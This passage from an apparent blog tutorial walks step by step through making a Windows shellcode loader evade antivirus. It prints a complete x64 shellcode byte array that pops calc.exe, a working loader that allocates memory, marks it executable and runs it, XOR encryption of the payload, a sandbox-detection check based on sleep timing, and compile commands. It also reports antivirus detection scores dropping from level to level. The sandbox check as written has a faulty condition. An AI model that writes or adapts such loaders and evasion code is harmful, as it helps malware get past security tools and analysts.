</span></span><span style="display:flex;"><span>	<span style="color:#f92672">&#34;terminal.integrated.shellArgs.windows&#34;</span>: [
</span></span><span style="display:flex;"><span>		<span style="color:#e6db74">&#34;/k&#34;</span>, <span style="color:#e6db74">&#34;C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Auxiliary\Build\vcvarsall.bat&#34;</span>, <span style="color:#e6db74">&#34;x64&#34;</span>
</span></span><span style="display:flex;"><span>	],
</span></span><span style="display:flex;"><span>	<span style="color:#f92672">&#34;terminal.integrated.automationShell.windows&#34;</span>: <span style="color:#66d9ef">null</span>,
</span></span><span style="display:flex;"><span>	<span style="color:#f92672">&#34;explorer.confirmDelete&#34;</span>: <span style="color:#66d9ef">false</span>,
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><h2 id="level-0---the-raw-shell-code">Level 0 - The Raw Shell Code</h2>
<p>To begin with, we write a program to execute our shell code with the help of a program as such:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-cpp" data-lang="cpp"><span style="display:flex;"><span><span style="color:#75715e">/// Compile With:
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">/// cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tcimplant.cpp /link /OUT:executables\level0.exe /SUBSYSTEM:CONSOLE /MACHINE:x64 
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span><span style="color:#75715e">#include</span> <span style="color:#75715e">&lt;stdio.h&gt;</span><span style="color:#75715e">
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">#include</span> <span style="color:#75715e">&lt;stdlib.h&gt;</span><span style="color:#75715e">
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">#include</span> <span style="color:#75715e">&lt;string.h&gt;</span><span style="color:#75715e">
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">#include</span> <span style="color:#75715e">&lt;windows.h&gt;</span><span style="color:#75715e">
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">// Payload String - Level0
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span><span style="color:#66d9ef">unsigned</span> <span style="color:#66d9ef">char</span> payload[] <span style="color:#f92672">=</span> {
</span></span><span style="display:flex;"><span>    <span style="color:#ae81ff">0xfc</span>, <span style="color:#ae81ff">0x48</span>, <span style="color:#ae81ff">0x83</span>, <span style="color:#ae81ff">0xe4</span>, <span style="color:#ae81ff">0xf0</span>, <span style="color:#ae81ff">0xe8</span>, <span style="color:#ae81ff">0xc0</span>, <span style="color:#ae81ff">0x00</span>, <span style="color:#ae81ff">0x00</span>, <span style="color:#ae81ff">0x00</span>, <span style="color:#ae81ff">0x41</span>, <span style="color:#ae81ff">0x51</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#ae81ff">0x41</span>, <span style="color:#ae81ff">0x50</span>, <span style="color:#ae81ff">0x52</span>, <span style="color:#ae81ff">0x51</span>, <span style="color:#ae81ff">0x56</span>, <span style="color:#ae81ff">0x48</span>, <span style="color:#ae81ff">0x31</span>, <span style="color:#ae81ff">0xd2</span>, <span style="color:#ae81ff">0x65</span>, <span style="color:#ae81ff">0x48</span>, <span style="color:#ae81ff">0x8b</span>, <span style="color:#ae81ff">0x52</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#ae81ff">0x60</span>, <span style="color:#ae81ff">0x48</span>, <span style="color:#ae81ff">0x8b</span>, <span style="color:#ae81ff">0x52</span>, <span style="color:#ae81ff">0x18</span>, <span style="color:#ae81ff">0x48</span>, <span style="color:#ae81ff">0x8b</span>, <span style="color:#ae81ff">0x52</span>, <span style="color:#ae81ff">0x20</span>, <span style="color:#ae81ff">0x48</span>, <span style="color:#ae81ff">0x8b</span>, <span style="color:#ae81ff">0x72</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#ae81ff">0x50</span>, <span style="color:#ae81ff">0x48</span>, <span style="color:#ae81ff">0x0f</span>, <span style="color:#ae81ff">0xb7</span>, <span style="color:#ae81ff">0x4a</span>, <span style="color:#ae81ff">0x4a</span>, <span style="color:#ae81ff">0x4d</span>, <span style="color:#ae81ff">0x31</span>, <span style="color:#ae81ff">0xc9</span>, <span style="color:#ae81ff">0x48</span>, <span style="color:#ae81ff">0x31</span>, <span style="color:#ae81ff">0xc0</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#ae81ff">0xac</span>, <span style="color:#ae81ff">0x3c</span>, <span style="color:#ae81ff">0x61</span>, <span style="color:#ae81ff">0x7c</span>, <span style="color:#ae81ff">0x02</span>, <span style="color:#ae81ff">0x2c</span>, <span style="color:#ae81ff">0x20</span>, <span style="color:#ae81ff">0x41</span>, <span style="color:#ae81ff">0xc1</span>, <span style="color:#ae81ff">0xc9</span>, <span style="color:#ae81ff">0x0d</span>, <span style="color:#ae81ff">0x41</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#ae81ff">0x01</span>, <span style="color:#ae81ff">0xc1</span>, <span style="color:#ae81ff">0xe2</span>, <span style="color:#ae81ff">0xed</span>, <span style="color:#ae81ff">0x52</span>, <span style="color:#ae81ff">0x41</span>, <span style="color:#ae81ff">0x51</span>, <span style="color:#ae81ff">0x48</span>, <span style="color:#ae81ff">0x8b</span>, <span style="color:#ae81ff">0x52</span>, <span style="color:#ae81ff">0x20</span>, <span style="color:#ae81ff">0x8b</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#ae81ff">0x42</span>, <span style="color:#ae81ff">0x3c</span>, <span style="color:#ae81ff">0x48</span>, <span style="color:#ae81ff">0x01</span>, <span style="color:#ae81ff">0xd0</span>, <span style="color:#ae81ff">0x8b</span>, <span style="color:#ae81ff">0x80</span>, <span style="color:#ae81ff">0x88</span>, <span style="color:#ae81ff">0x00</span>, <span style="color:#ae81ff">0x00</span>, <span style="color:#ae81ff">0x00</span>, <span style="color:#ae81ff">0x48</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#ae81ff">0x85</span>, <span style="color:#ae81ff">0xc0</span>, <span style="color:#ae81ff">0x74</span>, <span style="color:#ae81ff">0x67</span>, <span style="color:#ae81ff">0x48</span>, <span style="color:#ae81ff">0x01</span>, <span style="color:#ae81ff">0xd0</span>, <span style="color:#ae81ff">0x50</span>, <span style="color:#ae81ff">0x8b</span>, <span style="color:#ae81ff">0x48</span>, <span style="color:#ae81ff">0x18</span>, <span style="color:#ae81ff">0x44</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#ae81ff">0x8b</span>, <span style="color:#ae81ff">0x40</span>, <span style="color:#ae81ff">0x20</span>, <span style="color:#ae81ff">0x49</span>, <span style="color:#ae81ff">0x01</span>, <span style="color:#ae81ff">0xd0</span>, <span style="color:#ae81ff">0xe3</span>, <span style="color:#ae81ff">0x56</span>, <span style="color:#ae81ff">0x48</span>, <span style="color:#ae81ff">0xff</span>, <span style="color:#ae81ff">0xc9</span>, <span style="color:#ae81ff">0x41</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#ae81ff">0x8b</span>, <span style="color:#ae81ff">0x34</span>, <span style="color:#ae81ff">0x88</span>, <span style="color:#ae81ff">0x48</span>, <span style="color:#ae81ff">0x01</span>, <span style="color:#ae81ff">0xd6</span>, <span style="color:#ae81ff">0x4d</span>, <span style="color:#ae81ff">0x31</span>, <span style="color:#ae81ff">0xc9</span>, <span style="color:#ae81ff">0x48</span>, <span style="color:#ae81ff">0x31</span>, <span style="color:#ae81ff">0xc0</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#ae81ff">0xac</span>, <span style="color:#ae81ff">0x41</span>, <span style="color:#ae81ff">0xc1</span>, <span style="color:#ae81ff">0xc9</span>, <span style="color:#ae81ff">0x0d</span>, <span style="color:#ae81ff">0x41</span>, <span style="color:#ae81ff">0x01</span>, <span style="color:#ae81ff">0xc1</span>, <span style="color:#ae81ff">0x38</span>, <span style="color:#ae81ff">0xe0</span>, <span style="color:#ae81ff">0x75</span>, <span style="color:#ae81ff">0xf1</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#ae81ff">0x4c</span>, <span style="color:#ae81ff">0x03</span>, <span style="color:#ae81ff">0x4c</span>, <span style="color:#ae81ff">0x24</span>, <span style="color:#ae81ff">0x08</span>, <span style="color:#ae81ff">0x45</span>, <span style="color:#ae81ff">0x39</span>, <span style="color:#ae81ff">0xd1</span>, <span style="color:#ae81ff">0x75</span>, <span style="color:#ae81ff">0xd8</span>, <span style="color:#ae81ff">0x58</span>, <span style="color:#ae81ff">0x44</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#ae81ff">0x8b</span>, <span style="color:#ae81ff">0x40</span>, <span style="color:#ae81ff">0x24</span>, <span style="color:#ae81ff">0x49</span>, <span style="color:#ae81ff">0x01</span>, <span style="color:#ae81ff">0xd0</span>, <span style="color:#ae81ff">0x66</span>, <span style="color:#ae81ff">0x41</span>, <span style="color:#ae81ff">0x8b</span>, <span style="color:#ae81ff">0x0c</span>, <span style="color:#ae81ff">0x48</span>, <span style="color:#ae81ff">0x44</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#ae81ff">0x8b</span>, <span style="color:#ae81ff">0x40</span>, <span style="color:#ae81ff">0x1c</span>, <span style="color:#ae81ff">0x49</span>, <span style="color:#ae81ff">0x01</span>, <span style="color:#ae81ff">0xd0</span>, <span style="color:#ae81ff">0x41</span>, <span style="color:#ae81ff">0x8b</span>, <span style="color:#ae81ff">0x04</span>, <span style="color:#ae81ff">0x88</span>, <span style="color:#ae81ff">0x48</span>, <span style="color:#ae81ff">0x01</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#ae81ff">0xd0</span>, <span style="color:#ae81ff">0x41</span>, <span style="color:#ae81ff">0x58</span>, <span style="color:#ae81ff">0x41</span>, <span style="color:#ae81ff">0x58</span>, <span style="color:#ae81ff">0x5e</span>, <span style="color:#ae81ff">0x59</span>, <span style="color:#ae81ff">0x5a</span>, <span style="color:#ae81ff">0x41</span>, <span style="color:#ae81ff">0x58</span>, <span style="color:#ae81ff">0x41</span>, <span style="color:#ae81ff">0x59</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#ae81ff">0x41</span>, <span style="color:#ae81ff">0x5a</span>, <span style="color:#ae81ff">0x48</span>, <span style="color:#ae81ff">0x83</span>, <span style="color:#ae81ff">0xec</span>, <span style="color:#ae81ff">0x20</span>, <span style="color:#ae81ff">0x41</span>, <span style="color:#ae81ff">0x52</span>, <span style="color:#ae81ff">0xff</span>, <span style="color:#ae81ff">0xe0</span>, <span style="color:#ae81ff">0x58</span>, <span style="color:#ae81ff">0x41</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#ae81ff">0x59</span>, <span style="color:#ae81ff">0x5a</span>, <span style="color:#ae81ff">0x48</span>, <span style="color:#ae81ff">0x8b</span>, <span style="color:#ae81ff">0x12</span>, <span style="color:#ae81ff">0xe9</span>, <span style="color:#ae81ff">0x57</span>, <span style="color:#ae81ff">0xff</span>, <span style="color:#ae81ff">0xff</span>, <span style="color:#ae81ff">0xff</span>, <span style="color:#ae81ff">0x5d</span>, <span style="color:#ae81ff">0x48</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#ae81ff">0xba</span>, <span style="color:#ae81ff">0x01</span>, <span style="color:#ae81ff">0x00</span>, <span style="color:#ae81ff">0x00</span>, <span style="color:#ae81ff">0x00</span>, <span style="color:#ae81ff">0x00</span>, <span style="color:#ae81ff">0x00</span>, <span style="color:#ae81ff">0x00</span>, <span style="color:#ae81ff">0x00</span>, <span style="color:#ae81ff">0x48</span>, <span style="color:#ae81ff">0x8d</span>, <span style="color:#ae81ff">0x8d</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#ae81ff">0x01</span>, <span style="color:#ae81ff">0x01</span>, <span style="color:#ae81ff">0x00</span>, <span style="color:#ae81ff">0x00</span>, <span style="color:#ae81ff">0x41</span>, <span style="color:#ae81ff">0xba</span>, <span style="color:#ae81ff">0x31</span>, <span style="color:#ae81ff">0x8b</span>, <span style="color:#ae81ff">0x6f</span>, <span style="color:#ae81ff">0x87</span>, <span style="color:#ae81ff">0xff</span>, <span style="color:#ae81ff">0xd5</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#ae81ff">0xbb</span>, <span style="color:#ae81ff">0xf0</span>, <span style="color:#ae81ff">0xb5</span>, <span style="color:#ae81ff">0xa2</span>, <span style="color:#ae81ff">0x56</span>, <span style="color:#ae81ff">0x41</span>, <span style="color:#ae81ff">0xba</span>, <span style="color:#ae81ff">0xa6</span>, <span style="color:#ae81ff">0x95</span>, <span style="color:#ae81ff">0xbd</span>, <span style="color:#ae81ff">0x9d</span>, <span style="color:#ae81ff">0xff</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#ae81ff">0xd5</span>, <span style="color:#ae81ff">0x48</span>, <span style="color:#ae81ff">0x83</span>, <span style="color:#ae81ff">0xc4</span>, <span style="color:#ae81ff">0x28</span>, <span style="color:#ae81ff">0x3c</span>, <span style="color:#ae81ff">0x06</span>, <span style="color:#ae81ff">0x7c</span>, <span style="color:#ae81ff">0x0a</span>, <span style="color:#ae81ff">0x80</span>, <span style="color:#ae81ff">0xfb</span>, <span style="color:#ae81ff">0xe0</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#ae81ff">0x75</span>, <span style="color:#ae81ff">0x05</span>, <span style="color:#ae81ff">0xbb</span>, <span style="color:#ae81ff">0x47</span>, <span style="color:#ae81ff">0x13</span>, <span style="color:#ae81ff">0x72</span>, <span style="color:#ae81ff">0x6f</span>, <span style="color:#ae81ff">0x6a</span>, <span style="color:#ae81ff">0x00</span>, <span style="color:#ae81ff">0x59</span>, <span style="color:#ae81ff">0x41</span>, <span style="color:#ae81ff">0x89</span>,
</span></span><span style="display:flex;"><span>    <span style="color:#ae81ff">0xda</span>, <span style="color:#ae81ff">0xff</span>, <span style="color:#ae81ff">0xd5</span>, <span style="color:#ae81ff">0x63</span>, <span style="color:#ae81ff">0x61</span>, <span style="color:#ae81ff">0x6c</span>, <span style="color:#ae81ff">0x63</span>, <span style="color:#ae81ff">0x2e</span>, <span style="color:#ae81ff">0x65</span>, <span style="color:#ae81ff">0x78</span>, <span style="color:#ae81ff">0x65</span>, <span style="color:#ae81ff">0x00</span>
</span></span><span style="display:flex;"><span>};
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">// Length of payload array
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span><span style="color:#66d9ef">unsigned</span> <span style="color:#66d9ef">int</span> payload_len <span style="color:#f92672">=</span> (<span style="color:#66d9ef">unsigned</span> <span style="color:#66d9ef">int</span>)(<span style="color:#66d9ef">sizeof</span>(payload)<span style="color:#f92672">/</span><span style="color:#66d9ef">sizeof</span>(payload[<span style="color:#ae81ff">0</span>]));
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  
</span></span><span style="display:flex;"><span><span style="color:#75715e">/// Main Function
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">///
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">/// Returns
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">///  0 - OK
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">/// -1 - VirtualAlloc() failed
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">/// -2 - VirtualProtect() failed
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">/// -3 - CreateThread() failed
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">/// -4 - WaitForSingleObject() failed
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span><span style="color:#66d9ef">int</span> <span style="color:#a6e22e">main</span>(<span style="color:#66d9ef">void</span>){
</span></span><span style="display:flex;"><span>    BOOL rv;
</span></span><span style="display:flex;"><span>    HANDLE th;
</span></span><span style="display:flex;"><span>    DWORD _event <span style="color:#f92672">=</span> <span style="color:#ae81ff">0</span>;
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">void</span> <span style="color:#f92672">*</span> exec_mem;
</span></span><span style="display:flex;"><span>    DWORD oldprotect <span style="color:#f92672">=</span> <span style="color:#ae81ff">0</span>;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#75715e">// Allocate a memory buffer for payload
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>    exec_mem <span style="color:#f92672">=</span> VirtualAlloc(<span style="color:#ae81ff">0</span>, payload_len, MEM_COMMIT <span style="color:#f92672">|</span> MEM_RESERVE, PAGE_READWRITE);
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">if</span> (exec_mem <span style="color:#f92672">==</span> NULL){
</span></span><span style="display:flex;"><span>        <span style="color:#75715e">// fprintf(stderr, &#34;VirtualAlloc Failed with error code: %d\n&#34;, GetLastError());
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>        <span style="color:#66d9ef">return</span> <span style="color:#f92672">-</span><span style="color:#ae81ff">1</span>;
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#75715e">// Copy payload to new buffer
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>    RtlMoveMemory(exec_mem, payload, payload_len);
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#75715e">// Make new buffer as executable
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>    rv <span style="color:#f92672">=</span> VirtualProtect(exec_mem, payload_len, PAGE_EXECUTE_READ, <span style="color:#f92672">&amp;</span>oldprotect);
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">if</span> ( rv <span style="color:#f92672">==</span> <span style="color:#ae81ff">0</span> ) {
</span></span><span style="display:flex;"><span>        <span style="color:#75715e">// fprintf(stderr, &#34;VirtualProtect Failed with error code: %d\n&#34;, GetLastError());
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>        <span style="color:#66d9ef">return</span> <span style="color:#f92672">-</span><span style="color:#ae81ff">2</span>;
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#75715e">// Create Thread To run shellcode
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>    th <span style="color:#f92672">=</span> CreateThread(<span style="color:#ae81ff">0</span>, <span style="color:#ae81ff">0</span>, (LPTHREAD_START_ROUTINE) exec_mem, <span style="color:#ae81ff">0</span>, <span style="color:#ae81ff">0</span>, <span style="color:#ae81ff">0</span>);
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">if</span> (th <span style="color:#f92672">==</span> NULL){
</span></span><span style="display:flex;"><span>        <span style="color:#75715e">// fprintf(stderr, &#34;CreateThread Failed with error code: %d\n&#34;, GetLastError());
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>        <span style="color:#66d9ef">return</span> <span style="color:#f92672">-</span><span style="color:#ae81ff">3</span>;
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    _event <span style="color:#f92672">=</span> WaitForSingleObject(th, <span style="color:#f92672">-</span><span style="color:#ae81ff">1</span>);
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">if</span>(_event <span style="color:#f92672">==</span> WAIT_FAILED){
</span></span><span style="display:flex;"><span>        <span style="color:#75715e">// fprintf(stderr, &#34;WaitForSingleObject Failed with error code: %d\n&#34;, GetLastError());
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>        <span style="color:#66d9ef">return</span> <span style="color:#f92672">-</span><span style="color:#ae81ff">4</span>;
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>  
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">return</span> <span style="color:#ae81ff">0</span>;
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>The program basically takes the payload generated by Metasploit, creates a memory region with <strong>Read</strong> and <strong>Write</strong> permissions to hold the same, followed by changing the permissions of the region to <strong>Read</strong> and <strong>Execute</strong> before finally creating a thread to execute it.</p>
<p>The above program can be compiled with:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tcimplant.cpp /link /OUT:level0.exe /SUBSYSTEM:CONSOLE /MACHINE:x6
</span></span></code></pre></div><p>This should create a <code>level0.exe</code> executable file in the current directory which, when run, pops up the <code>calc.exe</code> program.</p>
<h3 id="antiscan-analysis">Antiscan Analysis</h3>
<p>We see that most AV engines flag the binary and rightfully so because it barely contains any obfuscation and Metasploit payloads have well-defined signatures at this point.</p>
<p><a href="https://antiscan.me/scan/new/result?id=0HTHHCYEJBjq"><strong>Antiscan Score: 13/26</strong></a></p>
<p><img src="/blogs/images/study-in-obfuscation/level0.png" alt="Level0 Analysis"></p>
<h2 id="level-1---xor-it">Level 1 - XOR it!</h2>
<p>The next thing we do is try to try be a little sneaky and encrypt the payload using the simplest encryption technique out there: XOR&rsquo;ing it.</p>
<p>With our payload from Level0, any dumb stupid AV engine can just run a simple signature check or even use something like the <code>strings</code> command to know that the executable hence produced is major sus. [It would be kinda worrying if it didn&rsquo;t flag this simple thing]</p>
<p>Now, coming back to XOR, we would first need a key to encrypt stuff with. For this, I chose a string which was already present in the Level0 executable so as to not arouse any suspicion.</p>
<p>We can then obtain the encrypted string from our <code>obfuscator.py</code> script using <code>Obsfucator.level1()</code>. As for the executable code, just for the sake of readibilty we add a header file <code>headers/obfuscators.h</code>  which contains the <code>XOR</code> function:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-c" data-lang="c"><span style="display:flex;"><span><span style="color:#75715e">#include</span> <span style="color:#75715e">&lt;stdlib.h&gt;</span><span style="color:#75715e">
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">#include</span> <span style="color:#75715e">&lt;stdio.h&gt;</span><span style="color:#75715e">
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">#include</span> <span style="color:#75715e">&lt;string.h&gt;</span><span style="color:#75715e">
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">// XOR two strings
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span><span style="color:#66d9ef">void</span> <span style="color:#a6e22e">XOR</span>(<span style="color:#66d9ef">unsigned</span> <span style="color:#66d9ef">char</span> <span style="color:#f92672">*</span> payload, <span style="color:#66d9ef">unsigned</span> <span style="color:#66d9ef">int</span> payload_len, <span style="color:#66d9ef">const</span> <span style="color:#66d9ef">char</span> <span style="color:#f92672">*</span> xor_key, <span style="color:#66d9ef">unsigned</span> <span style="color:#66d9ef">int</span> xor_key_len){
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">int</span> j;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    j <span style="color:#f92672">=</span> <span style="color:#ae81ff">0</span>;
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">for</span> (<span style="color:#66d9ef">int</span> i <span style="color:#f92672">=</span> <span style="color:#ae81ff">0</span>; i <span style="color:#f92672">&lt;</span> payload_len; i<span style="color:#f92672">++</span>) {
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">if</span> (j <span style="color:#f92672">==</span> xor_key_len) j <span style="color:#f92672">=</span> <span style="color:#ae81ff">0</span>;
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>        payload[i] <span style="color:#f92672">=</span> payload[i] <span style="color:#f92672">^</span> xor_key[j];
</span></span><span style="display:flex;"><span>        j<span style="color:#f92672">++</span>;
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>And then, we call the <code>XOR()</code> function right before copying the payload to the target memory address.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-c" data-lang="c"><span style="display:flex;"><span>...
</span></span><span style="display:flex;"><span>...
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">XOR</span>(payload, payload_len, XOR_KEY, xor_key_len);
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">// Copy payload to new buffer
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span><span style="color:#a6e22e">RtlMoveMemory</span>(exec_mem, payload, payload_len);
</span></span><span style="display:flex;"><span>...
</span></span><span style="display:flex;"><span>...
</span></span></code></pre></div><p>Finally, we compile it with:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-powershell" data-lang="powershell"><span style="display:flex;"><span>cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tcimplant.cpp /I <span style="color:#e6db74">&#34;headers&#34;</span> /link /OUT<span style="color:#960050;background-color:#1e0010">:</span>executables\level0.exe /SUBSYSTEM<span style="color:#960050;background-color:#1e0010">:</span>CONSOLE /MACHINE<span style="color:#960050;background-color:#1e0010">:</span>x64 
</span></span></code></pre></div><h3 id="antiscan-analysis-1">Antiscan Analysis</h3>
<p>The encryprion does bring down the detection rates a bittle but still, there are ways to go :)</p>
<p><a href="https://antiscan.me/scan/new/result?id=6huOmULlMd25"><strong>Antiscan Score: 9/26</strong></a></p>
<p><img src="/blogs/images/study-in-obfuscation/level1.png" alt="Level1 Analysis"></p>
<h2 id="level-2---sleep-patching-sandbox">Level 2 - Sleep Patching Sandbox</h2>
<p>Taking a short detour from the usual from playing with the shell code, we try and implement some sandbox detection techiniques, starting off with <em><strong>&ldquo;Sleep Patching Sandboxes&rdquo;</strong></em>. Accoring to <a href="www.isaca.org">ICASA</a>:</p>
<blockquote>
<p>“Sleep Patching Sandboxes will patch the sleep function to try to outmaneuver malware that uses time delays. In response, malware will check to see if time was accelerated. Malware will get the timestamp, go to sleep and then again get the timestamp when it wakes up. The time difference between the timestamps should be the same duration as the amount of time the malware was programmed to sleep. If not, then the malware knows it is running in an environment that is patching the sleep function, which would only happen in a sandbox.”</p>
</blockquote>
<p>Thus to bypass this, we implement the following function in <code>sandbox.h</code> to check for accelerated time:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-c" data-lang="c"><span style="display:flex;"><span><span style="color:#75715e">/// User defined PPDs
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span><span style="color:#75715e">#define L_INTERVAL  950    </span><span style="color:#75715e">// Lower Time Limit
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span><span style="color:#75715e">#define INTERVAL    1000   </span><span style="color:#75715e">// Mean  Time Limit
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span><span style="color:#75715e">#define U_INTERVAL  1050   </span><span style="color:#75715e">// Upper Time Limit
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">int</span> <span style="color:#a6e22e">__check_sleep_patch</span>(){
</span></span><span style="display:flex;"><span>    DWORD startCount <span style="color:#f92672">=</span> <span style="color:#a6e22e">GetTickCount</span>();
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">Sleep</span>(INTERVAL);
</span></span><span style="display:flex;"><span>    DWORD endCount <span style="color:#f92672">=</span> <span style="color:#a6e22e">GetTickCount</span>();
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    DWORD timeSpan <span style="color:#f92672">=</span> endCount <span style="color:#f92672">-</span> startCount;
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">if</span> ((L_INTERVAL <span style="color:#f92672">&gt;</span> timeSpan) <span style="color:#f92672">&amp;&amp;</span> (timeSpan <span style="color:#f92672">&gt;</span> U_INTERVAL)){
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">return</span> <span style="color:#f92672">-</span><span style="color:#ae81ff">1</span>;
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>    
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">return</span> <span style="color:#ae81ff">0</span>;
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>Thus, if the sandbox is accelerating time, then the <code>timeSpan</code> value wouldn&rsquo;t be in the range <code>L_INTERVAL</code> and <code>U_INTERVAL</code>, hence signifying that the program is running in a sandbox, thereby prompting the program to exit without executing any shellcode in order to avoid detection.</p>
<p>The program is compiled with:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-c" data-lang="c"><span style="display:flex;"><span>cl.exe <span style="color:#f92672">/</span>nologo <span style="color:#f92672">/</span>Ox <span style="color:#f92672">/</span>MT <span style="color:#f92672">/</span>W0 <span style="color:#f92672">/</span>GS<span style="color:#f92672">-</span> <span style="color:#f92672">/</span>DNDEBUG <span style="color:#f92672">/</span>Tcimplant.cpp <span style="color:#f92672">/</span>I <span style="color:#e6db74">&#34;headers&#34;</span> <span style="color:#f92672">/</span>link <span style="color:#f92672">/</span>OUT:executables<span style="color:#960050;background-color:#1e0010">\</span>level2.exe <span style="color:#f92672">/</span>SUBSYSTEM:CONSOLE <span style="color:#f92672">/</span>MACHINE:x64 
</span></span></code></pre></div><h3 id="antiscan-analysis-2">Antiscan Analysis</h3>
